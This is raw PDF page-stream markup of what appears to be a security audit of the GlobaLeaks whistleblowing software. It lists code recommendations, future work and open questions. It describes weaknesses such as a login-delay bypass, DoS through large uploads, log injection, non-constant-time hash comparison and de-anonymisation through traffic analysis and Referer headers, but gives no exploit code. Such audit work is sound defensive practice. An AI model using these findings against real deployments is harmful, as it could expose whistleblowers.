BT 1 0 0 1 0 38 Tm .693318 Tw 12 TL /F1 10 Tf 0 0 0 rg (In the case of the previous recommendation, ) Tj /F3 10 Tf (from) Tj ( ) Tj (foo) Tj ( ) Tj (import) Tj ( ) Tj (* ) Tj /F1 10 Tf (can cause the same problem) Tj T* 0 Tw .484269 Tw (as ) Tj /F3 10 Tf (import) Tj ( ) Tj (random) Tj /F1 10 Tf (, if ) Tj /F3 10 Tf (foo ) Tj /F1 10 Tf (happens to import ) Tj /F3 10 Tf (random) Tj /F1 10 Tf (. This pattern occurs in ) Tj /F3 10 Tf (security.py ) Tj /F1 10 Tf (and) Tj T* 0 Tw 3.59748 Tw (elsewhere. We recommend eschewing ) Tj /F3 10 Tf (import) Tj ( ) Tj (*) Tj /F1 10 Tf (; where a shorthand is needed, define an) Tj T* 0 Tw (abbreviation like ) Tj /F3 10 Tf (import) Tj ( ) Tj (foo) Tj ( ) Tj (as) Tj ( ) Tj (F) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 76.86614 cm
Q
 
endstream
endobj
% 'R377': class PDFStream 
377 0 obj
% page stream
<< /Length 7250 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 663.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 87 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 51 cm
q
BT 1 0 0 1 0 38 Tm 1.410888 Tw 12 TL /F3 10 Tf 0 0 0 rg (except: ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (except) Tj ( ) Tj (Exception ) Tj /F1 10 Tf (have hard-to-predict effects on execution. They appear over) Tj T* 0 Tw .94686 Tw (100 times in GLBackend, too many to audit well. According to ) Tj /F4 10 Tf (pylint) Tj /F1 10 Tf (, 44 of them \(outside ) Tj /F3 10 Tf (tests/) Tj /F1 10 Tf (\)) Tj T* 0 Tw 1.984983 Tw (might suppress the original exception. We did not investigate how these might have been done) Tj T* 0 Tw (differently.) Tj T* ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL 1.829983 Tw (This pattern may allow vulnerabilities where an attacker discovers a way to trigger an exception) Tj T* 0 Tw 1.80784 Tw (never anticipated by developers or discovered in testing. Even when this doesn't happen due to) Tj T* 0 Tw 1.778651 Tw (malice, it can lead to bugs in production deployments that were never anticipated in testing and) Tj T* 0 Tw (development.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 657.0236 cm
Q
q
1 0 0 1 62.69291 633.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .343516 Tw 12 TL /F1 10 Tf 0 0 0 rg (Salts are generated by running ) Tj /F3 10 Tf (SHA512 ) Tj /F1 10 Tf (on a random string. There is less possibility for error if they) Tj T* 0 Tw (are generated directly.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 627.0236 cm
Q
q
1 0 0 1 62.69291 579.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm 1.608555 Tw 12 TL /F1 10 Tf 0 0 0 rg (JavaScript is easier to audit and debug in strict mode \() Tj /F3 10 Tf ('use strict') Tj /F1 10 Tf (\) and when ) Tj /F4 10 Tf (JSHint) Tj /F1 10 Tf (-clean.) Tj T* 0 Tw .715777 Tw /F3 10 Tf (jshint ) Tj /F1 10 Tf (on GLClient reports 162 of what it calls errors: using ) Tj /F3 10 Tf (== ) Tj /F1 10 Tf (instead of ) Tj /F3 10 Tf (===) Tj /F1 10 Tf (, and so on. It can) Tj T* 0 Tw .089461 Tw (be run with a config file to tailor what it deems worth reporting \(and we used a quick-and-dirty one for) Tj T* 0 Tw (our test\).) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 573.0236 cm
Q
q
1 0 0 1 62.69291 513.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 50 Tm 6.034976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (globaleaks/handlers/files.py ) Tj /F1 10 Tf (the file download count is checked with ) Tj /F3 10 Tf (== ) Tj /F1 10 Tf (in) Tj T* 0 Tw 1.665814 Tw /F3 10 Tf (download_file ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (download_all_files) Tj /F1 10 Tf (. It would be better to use ) Tj /F3 10 Tf (>) Tj (= ) Tj /F1 10 Tf (for the comparison,) Tj T* 0 Tw .870574 Tw (since it doesn't fail when a race condition or logic error somewhere else makes it one greater than) Tj T* 0 Tw .65528 Tw (the limit. Note: It may be possible to increase the count over the limit by downloading the collection) Tj T* 0 Tw (\(all files\) when it is at the limit.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 507.0236 cm
Q
q
1 0 0 1 62.69291 385.8419 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 106.1817 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 70.1817 cm
q
BT 1 0 0 1 0 38 Tm 1.728651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Assume all variables are malicious. Escape everything even if you know it's a constant string or) Tj T* 0 Tw 8.19152 Tw (doesn't contain special characters. An example of where this is not done is in) Tj T* 0 Tw .246905 Tw /F3 10 Tf (globaleaks/utils/utility.py) Tj /F1 10 Tf (. Here, ) Tj /F3 10 Tf (timeStr ) Tj /F1 10 Tf (is assumed to be safe \(and it may be\), but it's) Tj T* 0 Tw (good to get in the habit of escaping everything.) Tj T* ET
Q
Q
q
1 0 0 1 23 64.1817 cm
Q
q
1 0 0 1 23 39 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
.999274 0 0 .999274 0 0 cm
q
1 0 0 1 6.6 6.604796 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 426 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F3 10 Tf 0 0 0 rg (util) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (untilConcludes) Tj (\() Tj 0 .501961 0 rg (self) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (write) Tj (,) Tj ( ) Tj (timeStr) Tj ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj .729412 .129412 .129412 rg (" ") Tj 0 0 0 rg ( ) Tj .4 .4 .4 rg (+) Tj 0 0 0 rg ( ) Tj (sanitize_str) Tj (\() Tj (msgStr) Tj (\)\)) Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 39 cm
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .629987 Tw (Escaping should be done "on the way out" in a specific context instead of "on the way in", because) Tj T* 0 Tw .795542 Tw (you can't encode a value "ahead of time" unless you understand all contexts it will be used in, and) Tj T* 0 Tw (they all have consistent escaping rules.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 379.8419 cm
Q
q
1 0 0 1 62.69291 355.8419 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .558735 Tw (The client receives from the server an absolute time for session expiry, then checks against its own) Tj T* 0 Tw (clock. If a time interval is desired \("expire in 30 minutes"\), an interval should be sent.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 349.8419 cm
Q
q
1 0 0 1 62.69291 276.6419 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 58.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 58.2 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (It's error-prone to check for enumerations in this style:) Tj T* ET
Q
Q
q
1 0 0 1 23 52.2 cm
Q
q
1 0 0 1 23 27 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
BT 1 0 0 1 0 2 Tm  T* ET
q
1 0 0 1 20 0 cm
q
q
1 0 0 1 0 0 cm
q
1 0 0 1 6.6 6.6 cm
q
.662745 .662745 .662745 RG
.5 w
.960784 .960784 .862745 rg
n -6 -6 425.6898 24 re B*
Q
q
BT 1 0 0 1 0 2 Tm 12 TL /F6 10 Tf 0 .501961 0 rg (if) Tj /F3 10 Tf 0 0 0 rg ( ) Tj (status) Tj ( ) Tj .4 .4 .4 rg (==) Tj 0 0 0 rg ( ) Tj (ReceiverFile) Tj .4 .4 .4 rg (.) Tj 0 0 0 rg (_status_list) Tj ([) Tj .4 .4 .4 rg (2) Tj 0 0 0 rg (]:) Tj ( ) Tj /F7 10 Tf .25098 .501961 .501961 rg (# 'encrypted') Tj T* ET
Q
Q
Q
Q
Q
q
Q
Q
q
1 0 0 1 23 27 cm
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .994983 Tw (where the comment serves as the enumeration name. The numbers and comments can easily get) Tj T* 0 Tw (out of sync.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 276.6419 cm
Q
q
1 0 0 1 62.69291 276.6419 cm
Q
 
endstream
endobj
% 'R378': class PDFStream 
378 0 obj
% page stream
<< /Length 8287 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 744.0236 cm
q
BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Future Work) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 714.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Online Guessing Attacks) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 660.0236 cm
q
BT 1 0 0 1 0 38 Tm .489213 Tw 12 TL /F1 10 Tf 0 0 0 rg (The problem of remediating ) Tj 0 0 .501961 rg (Issue E. Parallel Requests Bypass Exponentially Increasing Login Delay ) Tj 0 0 0 rg (has) Tj T* 0 Tw .399488 Tw (been left as future work. We suggest exploring a defense that forces the client to solve a proof of work to) Tj T* 0 Tw 1.77881 Tw (limit the rate that they can make requests. There are several design alternatives, such as the use of) Tj T* 0 Tw 0 0 .501961 rg (CAPTCHAs) Tj 0 0 0 rg (.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 630.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Side-Channel Attacks) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 576.0236 cm
q
BT 1 0 0 1 0 38 Tm .809983 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not evaluate the full impact of side-channel attacks on ) Tj /F4 10 Tf (GlobaLeaks) Tj /F1 10 Tf (. Some possible side-channel) Tj T* 0 Tw 2.240697 Tw (issues are documented in ) Tj 0 0 .501961 rg (Issue J: Attacker May Be Able To Extract Secrets Through Side-Channel) Tj T* 0 Tw .722765 Tw (Attacks) Tj 0 0 0 rg (. However, we did not spend much time on this, so we feel that ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (could benefit from a) Tj T* 0 Tw (more focused effort on finding side-channel attacks.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 546.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Eliminating Threads) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 504.0236 cm
q
BT 1 0 0 1 0 26 Tm .134983 Tw 12 TL /F1 10 Tf 0 0 0 rg (As discussed in ) Tj 0 0 .501961 rg (Recommendations) Tj 0 0 0 rg (, a code organization without threads sharing state by default would be) Tj T* 0 Tw 1.324983 Tw (safer. Work under this heading includes more thorough auditing of the thread-using code and deciding) Tj T* 0 Tw (how to minimize or eliminate it.) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 474.0236 cm
q
BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Open Questions & Concerns) Tj T* ET
Q
Q
q
1 0 0 1 62.69291 462.0236 cm
Q
q
1 0 0 1 62.69291 462.0236 cm
Q
q
1 0 0 1 62.69291 438.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .669318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (process may be swapped to disk. This may leak encryption keys and plaintext Tip) Tj T* 0 Tw (contents to the swap file, which could be recovered by forensic analysis of the disk.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 432.0236 cm
Q
q
1 0 0 1 62.69291 396.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.50784 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (backend is written in Python, which, as a garbage collected language, does not) Tj T* 0 Tw .993555 Tw (make it easy to wipe variables that contained sensitive information. Could the plaintext contents of) Tj T* 0 Tw (submitted files \(and other secrets\) persist in memory long after they were supposed to be discarded?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 390.0236 cm
Q
q
1 0 0 1 62.69291 342.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm 2.471976 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (dump_file_fs\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (globaleaks/handlers/files.py ) Tj /F1 10 Tf (the first call to ) Tj /F3 10 Tf (read\(\) ) Tj /F1 10 Tf (has no) Tj T* 0 Tw .362339 Tw (argument, meaning it will read the whole file into memory. \(A comment indicates a 4kb chunk as the) Tj T* 0 Tw 1.521098 Tw (intention.\) A large file upload could cause DoS. We tried this and got "File is too large" from the) Tj T* 0 Tw (client, but we see nothing stopping an attack independent of the browser.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 336.0236 cm
Q
q
1 0 0 1 62.69291 300.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.537633 Tw 12 TL /F1 10 Tf 0 0 0 rg (The logging mechanism is vulnerable in the ) Tj /F4 10 Tf (info ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (debug ) Tj /F1 10 Tf (levels. We did not have time to fully) Tj T* 0 Tw 1.707674 Tw (analyze whether it is vulnerable in the ) Tj /F3 10 Tf (CRITICAL ) Tj /F1 10 Tf (level. The current sanitization of ) Tj /F3 10 Tf (log.err\(\)) Tj T* 0 Tw /F1 10 Tf (seems safe, though overcomplicated. ) Tj /F3 10 Tf (log.msg ) Tj /F1 10 Tf (is vulnerable, but we are unsure.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 294.0236 cm
Q
q
1 0 0 1 62.69291 270.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 14 Tm /F1 10 Tf 12 TL .589398 Tw (We did not investigate whether the backend might be vulnerable if its clock could be made to jump.) Tj T* 0 Tw (This might allow an attacker to use a session past its expiration date.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 264.0236 cm
Q
q
1 0 0 1 62.69291 204.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 50 Tm 1.395433 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not systematically check use of ) Tj /F3 10 Tf (@unauthenticated ) Tj /F1 10 Tf (and ) Tj /F3 10 Tf (@authenticated ) Tj /F1 10 Tf (for excess) Tj T* 0 Tw 2.693307 Tw (permissions. \(There are also similarly-named methods in ) Tj /F3 10 Tf (handlers/base.py ) Tj /F1 10 Tf (bearing neither) Tj T* 0 Tw .095318 Tw (decorator. Maybe they're not actual handlers?\) The default behavior of a handler with no decorator is) Tj T* 0 Tw 2.056651 Tw (almost the same as ) Tj /F3 10 Tf (@unauthenticated ) Tj /F1 10 Tf (\(by a reading of the source code\); this is an unsafe) Tj T* 0 Tw (default.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 198.0236 cm
Q
q
1 0 0 1 62.69291 150.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 38 Tm .10561 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj 0 0 .501961 rg (GlobaLeaks ticket 672) Tj 0 0 0 rg (, client-side PGP encryption is ruled out because it would tell receiver A that) Tj T* 0 Tw 2.113314 Tw (receiver B also received the file. Doesn't the comments/messaging feature leak that information) Tj T* 0 Tw .444692 Tw (anyway? Is there a way to encrypt a PGP message to multiple recipients so that the recipients can't) Tj T* 0 Tw (tell who the other recipients are?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 150.0236 cm
Q
q
1 0 0 1 62.69291 144.0236 cm
Q
q
1 0 0 1 62.69291 144.0236 cm
Q
q
1 0 0 1 62.69291 120.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm .558651 Tw 12 TL /F1 10 Tf 0 0 0 rg (If receivers are assumed to be adversarial in the threat model, what stops them from impersonating) Tj T* 0 Tw (each other on the page where the whistleblower selects the receiver?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 114.0236 cm
Q
q
1 0 0 1 62.69291 102.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (What happens when a whistleblower cancels a file upload while it's in progress?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 96.02362 cm
Q
 
endstream
endobj
% 'R379': class PDFStream 
379 0 obj
% page stream
<< /Length 11098 >>
stream
1 0 0 1 0 0 cm  BT /F1 12 Tf 14.4 TL ET
q
1 0 0 1 62.69291 729.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .394269 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (files.py) Tj /F1 10 Tf (, a 26-character random string called ) Tj /F3 10 Tf (saved_name ) Tj /F1 10 Tf (is generated, which is used as the) Tj T* 0 Tw .211235 Tw (destination file name. If there is a collision \(very unlikely, even with birthday\), it could corrupt another) Tj T* 0 Tw (Tip's file.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 723.0236 cm
Q
q
1 0 0 1 62.69291 687.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.129988 Tw 12 TL /F1 10 Tf 0 0 0 rg (We did not verify if Issue G is exploitable after the ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-decode bug is fixed. This can be done by) Tj T* 0 Tw 1.652976 Tw (having the server properly ) Tj /F3 10 Tf (URL) Tj /F1 10 Tf (-decode the ) Tj /F3 10 Tf (Content-Disposition ) Tj /F1 10 Tf (header sent by JavaScript,) Tj T* 0 Tw (then re-evaluating the impact of the vulnerability.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 681.0236 cm
Q
q
1 0 0 1 62.69291 633.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 33 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 38 Tm /F1 10 Tf 12 TL .621751 Tw (One purpose of the SHA256 hash \(See Issue B\) is so that the whistleblower can verify their upload) Tj T* 0 Tw 1.761647 Tw (was successful. We suggested remediating Issue B by removing the SHA256 feature altogether.) Tj T* 0 Tw 1.27436 Tw (This removes the whistleblower's ability to verify the upload, which is a lesser problem. It may be) Tj T* 0 Tw (possible to preserve this feature using a keyed HMAC, but we did not explore this possibility.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 627.0236 cm
Q
q
1 0 0 1 62.69291 603.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 9 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 14 Tm 1.138443 Tw 12 TL /F1 10 Tf 0 0 0 rg (Addressing ) Tj /F4 10 Tf (pylint) Tj /F1 10 Tf ('s reported 44 cases of swallowed exceptions could uncover problems or at least) Tj T* 0 Tw (make their absence clearer.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 597.0236 cm
Q
q
1 0 0 1 62.69291 561.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .178443 Tw 12 TL /F1 10 Tf 0 0 0 rg (In ) Tj /F3 10 Tf (get_expirations\(\) ) Tj /F1 10 Tf (in ) Tj /F3 10 Tf (security.py ) Tj /F1 10 Tf (it generates a temporary file by putting a random 16-bit) Tj T* 0 Tw .927209 Tw (number in the path. It does not check if the file already exists, so collisions are possible here. The) Tj T* 0 Tw (same thing is done elsewhere in the file, but it raises an exception if the file exists.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 555.0236 cm
Q
q
1 0 0 1 62.69291 543.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (Password hashes are not compared in constant time. See line 95 of ) Tj /F3 10 Tf (security.py) Tj /F1 10 Tf (.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 537.0236 cm
Q
q
1 0 0 1 62.69291 501.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm 1.670651 Tw 12 TL /F1 10 Tf 0 0 0 rg (By observing traffic \(especially the notification feature\), you may be able to tell which receiver is) Tj T* 0 Tw .408935 Tw (getting the Tip, which can leak info about its contents \(e.g. if there is one journalist to handle all and) Tj T* 0 Tw (only ) Tj /F4 10 Tf (National Security Agency ) Tj /F1 10 Tf (stories\).) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 495.0236 cm
Q
q
1 0 0 1 62.69291 483.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 -3 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (GlobaLeaks ) Tj /F1 10 Tf (has a unique query pattern, which might make traffic analysis easier.) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 477.0236 cm
Q
q
1 0 0 1 62.69291 441.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 21 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
BT 1 0 0 1 0 26 Tm .197045 Tw 12 TL /F1 10 Tf 0 0 0 rg (You can add regular links to the ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (pages. If a user clicks one, it might de-anonymize them) Tj T* 0 Tw 2.10686 Tw (\(because of the ) Tj /F3 10 Tf (Referer ) Tj /F1 10 Tf (header and the fact of clicking the link\), especially if they are using) Tj T* 0 Tw /F4 10 Tf (tor2web) Tj /F1 10 Tf (. ) Tj /F4 10 Tf (GlobaLeaks ) Tj /F1 10 Tf (docs say it adds rel="noreferer", but is this supported by all browsers?) Tj T* ET
Q
Q
q
Q
Q
q
1 0 0 1 62.69291 435.0236 cm
Q
q
1 0 0 1 62.69291 375.0236 cm
0 0 0 rg
BT /F1 10 Tf 12 TL ET
q
1 0 0 1 6 45 cm
q
0 0 0 rg
BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET
Q
Q
q
1 0 0 1 23 -3 cm
q
